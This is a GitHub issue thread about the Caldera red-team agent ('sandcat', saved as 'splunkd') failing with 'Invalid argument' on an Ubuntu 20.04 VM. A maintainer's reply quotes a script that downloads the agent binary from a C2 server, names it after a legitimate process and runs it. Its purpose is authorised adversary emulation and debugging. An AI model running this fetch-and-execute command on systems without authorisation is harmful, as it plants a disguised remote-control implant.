### ISSUE TITLE
splunkd Invalid argument

### ISSUE THREAD

**Issue by pmdoll** [mitre/caldera#2384]
**Describe the bug**
sandcat / splunkd does not run as documented. 

**To Reproduce**
 * Dowload splunkd as noted in deploy agent page.
```
./splunkd -server $server -group red -v
bash: ./splunkd: Invalid argument
```

**Expected behavior**
Something morethan invalid argument. Perhaps a recommendation on which argument was bad and what is expected.

**Screenshots**

**Desktop (please complete the following information):**
 - OS: Ubuntu 20.04

**Additional context**
The behavior is same for tag 3.1.0 and latest from master (4.0.0-aplha.2)

**Comment by cyber-arsenull** [comment]
Hey thanks for the report.

Did you set the environment variables prior to this? The full download script is:
```
server="http://0.0.0.0:8888";
curl -s -X POST -H "file:sandcat.go" -H "platform:linux" $server/file/download > splunkd;
chmod +x splunkd;
./splunkd -server $server -group red -v
```
The code for the agent is here:
https://github.com/mitre/sandcat/blob/master/gocat/sandcat.go
Each of the arguments you provided seemed to be legitimate. The only thing I can think of is that $server is not set prior to running it. 

I do think that there could be a better error response by the agent, I will put a ticket in for that.

**Comment by pmdoll** [comment]
Yes, I did set the `server` environment variable to the appropriate IP. I downloaded 2 binaries. One for mac and one for linux. The binary for mac works as expected. 

The binary for linux did not work. i.e  It gave me `Invalid argument` error message. More specifically, it did not work in a ubuntu 20.04 virtual machine which I built on my mac using parallel's desktop. 

Subsequently, The interesting bit I found is that the same binary worked in a caldera docker container. It also worked on another machine running ubuntu 18.04. 

So it seems that there is something peculiar about the Ubuntu 20.04 VMs that I create have this issue.

I agree having a better error response will be helpful and hopefully point to the root cause of the issue I am seeing in my VM.

Thanks @cyber-arsenull
